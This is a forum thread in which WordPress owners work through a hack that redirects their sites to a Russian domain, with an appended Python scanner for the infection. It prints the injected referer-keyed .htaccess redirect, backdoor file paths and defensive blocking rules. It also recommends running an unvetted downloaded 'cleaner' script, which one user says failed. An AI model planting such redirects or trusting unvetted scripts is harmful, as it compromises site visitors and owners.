I have been well and truly Hacked
I cannot access any of my pages /widgets/ anything!
when logged in I go to any of the above or anything on the sidebar
and it takes me to: https://bannortimqimulta.ru/industry/index.php
So I cannot access my site. How can I get round this problem?
Yeah, it’ll be a lengthy process… I have about 10 WordPress sites that’ll have to be checked.
I’m never offering to host a friend’s site again! ha.
I had 20. Took me about 4-5 hours in all. The longest part was the backup.
I would also recommend changing all the MySQL passwords at once and then loading the wp-config.php files one by one and checking that the corresponding site goes live again in between.
Okay, sorry to ask more questions. Just wanting to make sure I understand and do it right…
1) When you are changing the mySQL passwords, that is not connected to the wordpress user passwords correct? As in, I won’t need to send every user the new password? (i’ve never done much with sql databases)
2) How much do I need to pay you to fix mine? haha
Thanks, and I’ll probably have more questions once I start, which probably won’t be until Friday.
Thanks man for the info.
1) No. It’s the database that WordPress uses to store pretty much all info (pages, posts, users, etc.) so it’s vital. That database has a password, which isn’t associated with WordPress whatsoever. If everything is done properly, everything will stay the same. You just have to change your MySQL password first, and then switch out that wp-config.php to contain your new password for the MySQL database.
2) Haha. I’d do it on the cheap but am more than happy to answer questions you have along the way.
[email protected] if you want to talk about me doing it.
Guys, I can’t tell you how mad I was when I got all my sites hacked. I have tried about 4 different scripts to repair them until I came across this one. Just drop it in your domain’s root folder and then navigate to it at https://www.domainname.com/cleaner-cli_2.4.php, hit return and just wait. It will take about 3 minutes or so depending on the size of your site. But it went through and cleaned the hack code off every file on my site. I have run it 8 times now with no issues and it has gotten every file. You can find it here https://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html – just scroll down and download it. I am thinking about sending this guy money for the time he has saved me. Feel free to contact me if you need help with it.
I just ran the cleaner-cli_2.4.php script (took about 30 minutes) but the malicious code is still there. Didn’t work for me.
I’ll be giving charlesmkelley’s solutions a try later this afternoon/night and will get back to y’all once I’ve given that a whirl.
Charles,
I started with your tutorial on how to fix this problem but have a couple questions as i’m going…
I ran a scan of my backup files using Microsoft Security Essentials and it found 1 file, “Backdoor:php/shell.f” – Is that what I’ll be searching for in my backup?
Also, in Step 4 you say you searched the files from your backup using Dreamweaver, how did you search all of the files?
Hi, try the cloudsafe365_for_WP plugin; it stops and reports hacking and content theft (scraping).
The main issue is to stop the hacker from getting into the site in the first place. cloudsafe365_for_WP does exactly that: it stops a hacker and scraper cold and reports on their activity.
It also backs up your data, encrypts it and stores it in several secure locations. cloudsafe365 is an Amazon solutions partner.
contact me [email protected] or visit the website https://www.cloudsafe365.com.
If you need more information contact me…
I Downloaded my backup, scanned it using Microsoft Security Essentials (via Parallels for Mac) and found the backdoor file in the form of a .cache file in my uploads folder. I deleted that file, restored the .htaccess file in my public html folder.
I then installed and activated the BulletProof Security plugin to every site. This cleaned all .htaccess files.
So far (it’s been just over an hour) the sites are still clean and the .htaccess files are still clean. I will check back later tonight and if all is still good I will continue with changing all MySQL passwords.
THIS METHOD HAS BEEN WORKING FOR ME FOR 3 DAYS!!! ITS FINALLY GONE!!!
TO fix website malware issues: SUGGESTION: CHANGE ALL CPANEL & FTP ACCOUNT PASSWORDS then PROCEED (not the database passwords or WordPress installations) ONLY MAIN ACCOUNT AND FTP PASSWORDS
1. Update to the latest version of WordPress on each website installation (WordPress 3.3.1)
2. Add the plugin TimThumb Vulnerability Scanner to each website – activate the plugin, run/scan.
If it finds updates for you, check the updates and tell it to update.
3. Now locate any files on your server that stand out like (dhauei_cache.php), (ausdhuddeee.php) – I would say that it’s safe to delete these files immediately!!! But continue deleting files at your own risk. Use your own judgement or even take a look at the coding inside. Do this for each separate website (normally these files will be found on the root of each website (ex. yourdomain.com/dhauei_cache.php) but some may be found in other folders like:
/public_html/wp-content/uploads/_cache.php
/public_html/***/wp-includes/unzip.php
/public_html/*********/wp-includes/unzip.php
/public_html/*********/wp-content/uploads/_wp_cache.php
/www/wp-content/uploads/_cache.php
/www/*********/wp-includes/unzip.php
/www/*********/wp-content/uploads/_wp_cache.php
YOU NEED TO DELETE THESE FILES NOT THE DIRECTORIES/FOLDERS!!!!
4. Now go to your cPanel, locate home/yourservername/.htaccess (you should have access to this file), select it and click on change permissions (change from 444 to 644), click OK.
Next click on the same file and hit EDIT. If you know what you’re doing, add this code to the top of the .htaccess file:
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index_error.php [F,L]
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]
—-THEN SCROLL THRU AND REMOVE ALL OTHER CODES THAT LOOK LIKE THIS BELOW———REMEMBER DELETE THE STUFF LIKE BELOW——-
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ https://saveprefs .ru/astro/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ https://saveprefs .ru/astro/index.php [R=301,L]
</IfModule>
—–YOU MAY HAVE TO SCROLL THROUGH THE ENTIRE FILE BECAUSE SOMETIMES THE OTHER MALICIOUS CODES WILL BE AT THE BOTTOM—
ONCE YOU’RE DONE TAKING OUT ALL THE GARBAGE, THEN YOU CAN CLICK ON SAVE FILE…. NOW THERE SHOULD BE A .htaccess in each separate website you own. If you come to a .htaccess that’s already (chmod 644) – CHANCES ARE IT’S NOT AFFECTED SO YOU CAN VIEW THE FILE BY CLICKING EDIT, THEN ADDING THE LINES OF TEXT TO THE .HTACCESS OF EACH AND EVERY INDIVIDUAL WEBSITE (REMEMBERING TO chmod 644 EACH UNLESS THEY ARE ALREADY chmod 644).
NOTE IF YOU HAVE A WORDPRESS INSTALLATION INSIDE A FOLDER (EX. yourdomain.com/wpblog/.htaccess) THEN YOU WILL NOT HAVE TO ADD THE LINE OF CODE TO THAT .HTACCESS FILE. REASON FOR THIS IS BECAUSE THE MALWARE HAS ONLY AFFECTED DIRECT ROOT FOLDERS
(ex. yourdomain1.com/.htaccess, yourdomain2.com/.htaccess, yourdomain3.com/.htaccess)
ONCE YOU’RE DONE EDITING AND SAVING THE .HTACCESS FILES (DEPENDING ON HOW MANY SITES YOU HOST) – YOU’RE DONE
SCAN YOUR WEBSITE WITH THE FOLLOWING FREE TOOL: https://sitecheck.sucuri.net/
YOUR SITE SHOULD COME BACK CLEAN AND FREE OF MALWARE!!!!!! Compliments of RCBUX.COM
Ey, guys! I have cleaned 2 of my 7 websites tonight following your steps (Microsoft Security Essentials, installed BulletProof Security and also installed another WordPress security plugin) and they work OK! Thank you so much! I have had this problem since a few months ago and now it’s just finished! You’re all angels! hahahaha
@chris – Sorry for the delay. You can search an entire folder via Dreamweaver’s search/replace tool. I just searched the source code in a folder for the terms mentioned above, which was the malicious code that MSE picked up originally. I found more than what MSE had actually picked up though, as I mentioned. Also, I mentioned cleaning up the SQL passwords first because, if you don’t, whoever pushed this code to your site would still have your password to every single WordPress database you have despite you cleaning up the files, etc. It’s a more secure process if you delete the malicious files first and foremost, then change those MySQL passwords, cPanel passwords, etc., and upload new wp-config.php files to assure they have ZERO access to anything on your site, then reload default .htaccess files into each root directory to assure your site isn’t going to the .ru site anymore.
@boyxinfo – Dead wrong. You definitely want to change your database/MySQL passwords. The malicious code specifically pulls everything from your site that contains those passwords (i.e. wp-config.php, etc.). That means, as I mentioned above, despite you changing your cPanel and FTP password, they still could potentially gain access to your MySQL database should you not find all the files. Also, just simply “looking” for the file on a large hosting package like mine with 20 installs could take hours if not days (I had 66,000+ files to scan through). You should use already-existing tools, like MSE, as a starting point to search for such malicious code as I mentioned, or else it’s really pointless as you’re bound to miss something and the code will still be there. Also, how about some credit to me for the fix? Don’t try to own up to what I found.
@upango – Glad to help. Hope everything works out okay. Mine’s been going strong for about 3 days now. You may or may not have, but don’t forget to scan for the TimThumb vulnerability (how this hack got on your site in the first place), update any instance of TimThumb on your server, and update your WordPress installation(s) to secure against any further vulnerabilities.
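Charles’s advice above (search the whole backup tree for the planted code) and steps 3 and 4 of the RCBUX post (odd PHP files in uploads, and the referer-keyed redirect injected into the root .htaccess) can be automated. The script below is an added example written for this thread, not code from any poster, from WordPress or from any of the plugins mentioned; it walks a site root, flags PHP under wp-content/uploads, and flags RewriteRules that send visitors off-site only when an HTTP_REFERER condition matches. The fixture it builds is constructed, and redirect-target.invalid is a placeholder for the redirect host.

```python
import os, re, tempfile

REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)
OFFSITE_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+https?://([^/\s]+)", re.I)

def suspicious_htaccess_rules(text):
    """Hosts of off-site RewriteRules whose RewriteCond chain tests HTTP_REFERER."""
    hosts, guarded = [], False
    for line in text.splitlines():
        if REFERER_COND.match(line):
            guarded = True
        elif not line.strip().lower().startswith("rewritecond"):
            m = OFFSITE_RULE.match(line)
            if m and guarded:
                hosts.append(m.group(1))
            guarded = False  # a RewriteRule (or any other line) ends the chain
    return hosts

def scan_wordpress_root(root):
    """Walk a site root; return (finding, path) pairs for both artefacts."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower().endswith(".php") and "wp-content/uploads" in dirpath.replace(os.sep, "/"):
                findings.append(("php-in-uploads", path))  # uploads should hold no PHP
            elif name == ".htaccess":
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for host in suspicious_htaccess_rules(fh.read()):
                        findings.append(("referer-redirect:" + host, path))
    return findings

# Constructed fixture modelled on the thread: placeholder redirect host, empty stand-in backdoor, clean sub-blog.
SAMPLE_FILES = {
    ".htaccess": "<IfModule mod_rewrite.c>\nRewriteEngine On\n"
    "RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing|facebook)\\.(.*)\n"
    "RewriteRule ^(.*)$ https://redirect-target.invalid/astro/index.php [R=301,L]\n"
    "</IfModule>\n",
    "wpblog/.htaccess": "RewriteEngine On\nRewriteBase /\n"
    "RewriteRule ^index\\.php$ - [L]\nRewriteRule . /index.php [L]\n",
    "wp-content/uploads/_cache.php": "<?php /* constructed stand-in; no payload */\n",
}

def build_sample_tree():
    root = tempfile.mkdtemp()
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    return root
```

Point scan_wordpress_root at a downloaded backup to get the list of files worth opening by hand; a plain redirect without a referer condition (for example to the www host) is deliberately not flagged.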